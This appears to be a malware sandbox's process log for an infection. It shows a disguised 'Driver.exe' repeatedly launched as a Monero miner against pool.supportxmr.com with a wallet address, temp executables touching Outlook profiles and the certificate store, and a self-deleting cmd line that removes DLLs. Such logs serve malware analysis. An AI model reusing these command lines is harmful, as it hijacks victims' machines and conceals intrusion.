C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1200
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1808
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:936
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1008
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1204
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:876
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1748
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:656
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1732
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1984
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1848
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1536
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1760
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1968
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1920
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1988
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:920
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:2008
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2D09.exeC:\Users\Admin\AppData\Local\Temp\2D09.exe1⤵
- Executes dropped EXE
PID:1704
-
C:\Users\Admin\AppData\Local\Temp\3ED5.exeC:\Users\Admin\AppData\Local\Temp\3ED5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Modifies system certificate store
PID:1576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 3ED5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3ED5.exe" & del C:\ProgramData\*.dll & exit2⤵PID:1848
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 3ED5.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:2008
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:696
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1592